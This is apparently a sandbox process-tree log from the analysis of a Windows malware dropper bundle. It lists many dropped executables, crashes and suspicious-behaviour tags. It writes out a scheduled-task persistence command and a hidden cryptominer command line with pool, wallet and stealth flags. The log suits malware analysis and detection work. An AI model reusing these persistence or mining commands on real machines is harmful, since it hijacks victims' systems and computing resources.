        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:13560
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:23340
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:34156
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:36804
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31668
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:32488
        
        C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
        
        "C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
        11⤵
        
        PID:5588
        
        C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
        
        "C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
        12⤵
        
        PID:7872
        
        C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
        
        "C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
        12⤵
        
        PID:8076
        
        C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
        
        "C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
        12⤵
        
        PID:5816
        
        C:\Users\Admin\Documents\SDqPUZcc4IY80SeEYfOg7HhD.exe
        
        "C:\Users\Admin\Documents\SDqPUZcc4IY80SeEYfOg7HhD.exe"
        11⤵
        
        PID:1288
        
        C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        12⤵
        
        PID:6568
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        12⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6596 -s 1512
        13⤵
        Program crash
        
        PID:36660
        
        C:\Program Files (x86)\Company\NewProduct\inst001.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
        12⤵
        
        PID:6560
        
        C:\Users\Admin\Documents\YCRLjt1TWfhexFAuWZgEmQDj.exe
        
        "C:\Users\Admin\Documents\YCRLjt1TWfhexFAuWZgEmQDj.exe"
        11⤵
        
        PID:4964
        
        C:\Users\Admin\AppData\Roaming\2526580.exe
        
        "C:\Users\Admin\AppData\Roaming\2526580.exe"
        12⤵
        
        PID:6976
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6976 -s 2316
        13⤵
        Program crash
        
        PID:5192
        
        C:\Users\Admin\AppData\Roaming\6766514.exe
        
        "C:\Users\Admin\AppData\Roaming\6766514.exe"
        12⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Roaming\1305191.exe
        
        "C:\Users\Admin\AppData\Roaming\1305191.exe"
        12⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Roaming\4542136.exe
        
        "C:\Users\Admin\AppData\Roaming\4542136.exe"
        12⤵
        
        PID:6680
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 2460
        13⤵
        Program crash
        
        PID:9668
        
        C:\Users\Admin\Documents\7Wsoky01pxuaUmOfwOjqt6Ss.exe
        
        "C:\Users\Admin\Documents\7Wsoky01pxuaUmOfwOjqt6Ss.exe"
        11⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Roaming\8555344.exe
        
        "C:\Users\Admin\AppData\Roaming\8555344.exe"
        12⤵
        
        PID:6608
        
        C:\Users\Admin\AppData\Roaming\5902677.exe
        
        "C:\Users\Admin\AppData\Roaming\5902677.exe"
        12⤵
        
        PID:5216
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5216 -s 2352
        13⤵
        Program crash
        
        PID:5628
        
        C:\Users\Admin\AppData\Roaming\5964461.exe
        
        "C:\Users\Admin\AppData\Roaming\5964461.exe"
        12⤵
        
        PID:3376
        
        C:\Users\Admin\AppData\Roaming\4210999.exe
        
        "C:\Users\Admin\AppData\Roaming\4210999.exe"
        12⤵
        
        PID:5632
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 2452
        13⤵
        Program crash
        
        PID:2796
        
        C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe
        
        "C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe"
        11⤵
        
        PID:4768
        
        C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe
        
        "C:\Users\Admin\Documents\g7ouyvL9Jsfipaxs9vxw7ZMG.exe"
        12⤵
        
        PID:7008
        
        C:\Users\Admin\Documents\w5rhGqq4QqT2Kwp1CxeK9Gjr.exe
        
        "C:\Users\Admin\Documents\w5rhGqq4QqT2Kwp1CxeK9Gjr.exe"
        11⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\DPRwKy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\DPRwKy.exe"
        12⤵
        
        PID:6260
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\UopEIp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\UopEIp.exe"
        12⤵
        
        PID:7128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 280
        13⤵
        Program crash
        
        PID:12028
        
        C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe
        
        "C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe"
        11⤵
        
        PID:5088
        
        C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe
        
        "C:\Users\Admin\Documents\ELqpiTXPINxP8mXUSz48EV6Z.exe" -u
        12⤵
        
        PID:6188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxcvhg13.d5f\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\wxcvhg13.d5f\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\wxcvhg13.d5f\gcleaner.exe /mixfive
        10⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 280
        11⤵
        Program crash
        
        PID:5968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjpxenv1.k5z\autosubplayer.exe /S & exit
        9⤵
        
        PID:1200
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0qosaei5.ftu\installer.exe /qn CAMPAIGN=654 & exit
        9⤵
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\0qosaei5.ftu\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\0qosaei5.ftu\installer.exe /qn CAMPAIGN=654
        10⤵
        
        PID:5284
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iuazdd2v.40j\app.exe /8-2222 & exit
        9⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\iuazdd2v.40j\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\iuazdd2v.40j\app.exe /8-2222
        10⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 276
        11⤵
        Program crash
        
        PID:5416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4920
    - - C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri155442fc38b.exe
        
        Fri155442fc38b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3232
      - C:\Users\Admin\AppData\Roaming\3155661.exe
        
        "C:\Users\Admin\AppData\Roaming\3155661.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3800
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3800 -s 1916
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5196
      - C:\Users\Admin\AppData\Roaming\5554559.exe
        
        "C:\Users\Admin\AppData\Roaming\5554559.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4860
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:5888
      - C:\Users\Admin\AppData\Roaming\4132860.exe
        
        "C:\Users\Admin\AppData\Roaming\4132860.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:452
      - C:\Users\Admin\AppData\Roaming\1018857.exe
        
        "C:\Users\Admin\AppData\Roaming\1018857.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4452
      - C:\Users\Admin\AppData\Roaming\7570742.exe
        
        "C:\Users\Admin\AppData\Roaming\7570742.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5268
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 2468
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4784
    - - C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri15af75ee9b.exe
        
        Fri15af75ee9b.exe
        5⤵
        Executes dropped EXE
        
        PID:4188
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 284
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4456
    - - C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri1553f0ee90.exe
        
        Fri1553f0ee90.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1164
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5620
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:6020
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        
        PID:5256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:1644
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:6824
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:2140
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
        
        C:\Users\Admin\AppData\Roaming\8050610.exe
        
        "C:\Users\Admin\AppData\Roaming\8050610.exe"
        8⤵
        Executes dropped EXE
        
        PID:5600
        
        C:\Users\Admin\AppData\Roaming\5486143.exe
        
        "C:\Users\Admin\AppData\Roaming\5486143.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5724
        
        C:\Users\Admin\AppData\Roaming\4089607.exe
        
        "C:\Users\Admin\AppData\Roaming\4089607.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5524
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5524 -s 2324
        9⤵
        Program crash
        
        PID:344
        
        C:\Users\Admin\AppData\Roaming\7667268.exe
        
        "C:\Users\Admin\AppData\Roaming\7667268.exe"
        8⤵
        
        PID:6052
        
        C:\Users\Admin\AppData\Roaming\3069781.exe
        
        "C:\Users\Admin\AppData\Roaming\3069781.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 2452
        9⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1212
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1164 -s 1724
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4916
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 616
        8⤵
        Program crash
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
        7⤵
        Executes dropped EXE
        
        PID:4540
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 300
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:3588
        
        C:\Users\Admin\AppData\Local\Temp\is-IKU58.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IKU58.tmp\setup_2.tmp" /SL5="$10210,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\is-EUCKV.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EUCKV.tmp\setup_2.tmp" /SL5="$20210,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME7.exe
      4⤵
      PID:5060

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.2
1⤵
- Modifies data under HKEY_USERS
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4188 -ip 4188
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2340 -ip 2340
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4644
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:4648
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 460
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4648 -ip 4648
1⤵
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4916 -ip 4916
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4540 -ip 4540
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:724

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 604 -p 1164 -ip 1164
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5408

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2904
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5792
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 452
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5792 -ip 5792
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2440

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 3800 -ip 3800
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4344

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 5524 -ip 5524
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5268 -ip 5268
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1732 -ip 1732
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5972 -ip 5972
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5080

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1660
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6CB0AFB996247CAEE607E1C2A3A14E4F C
  2⤵
  PID:6028
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2DD0A19B5B85D06936027A7BDD9FBC40
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Executes dropped EXE
    - Kills process with taskkill
    PID:1656
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E6B5396C1BD70C2FE0DB6655E83C4773 E Global\MSI0000
  2⤵
  PID:5672

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1552

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5876
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5672
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 452
    3⤵
    - Program crash
    PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5672 -ip 5672
1⤵
PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3088 -ip 3088
1⤵
PID:3336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 2976 -ip 2976
1⤵
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3176 -ip 3176
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1368 -ip 1368
1⤵
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1080 -ip 1080
1⤵
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1636 -ip 1636
1⤵
PID:6648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2340 -ip 2340
1⤵
PID:6932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5520 -ip 5520
1⤵
PID:6952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5288 -ip 5288
1⤵
PID:6328

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6052 -ip 6052
1⤵
PID:5280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6260 -ip 6260
1⤵
PID:6196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1860 -ip 1860
1⤵
PID:1496

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7348
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 460
    3⤵
    - Program crash
    PID:7840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7376 -ip 7376
1⤵
PID:7268

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 6976 -ip 6976
1⤵
PID:8996

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 640 -p 5216 -ip 5216
1⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\C1CA.exe
C:\Users\Admin\AppData\Local\Temp\C1CA.exe
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6680 -ip 6680
1⤵
PID:8880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5492 -ip 5492
1⤵
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5632 -ip 5632
1⤵
PID:9836

C:\Users\Admin\AppData\Local\Temp\9400.exe
C:\Users\Admin\AppData\Local\Temp\9400.exe
1⤵
PID:10564

C:\Users\Admin\AppData\Local\Temp\B2A4.exe
C:\Users\Admin\AppData\Local\Temp\B2A4.exe
1⤵
PID:10332
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 304
  2⤵
  - Program crash
  PID:11328

C:\Users\Admin\AppData\Local\Temp\DF14.exe
C:\Users\Admin\AppData\Local\Temp\DF14.exe
1⤵
PID:3804
- C:\Users\Admin\AppData\Local\Temp\DF14.exe
  "C:\Users\Admin\AppData\Local\Temp\DF14.exe"
  2⤵
  PID:12244
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 1184
  2⤵
  - Program crash
  PID:12284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 10332 -ip 10332
1⤵
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3804 -ip 3804
1⤵
PID:11484

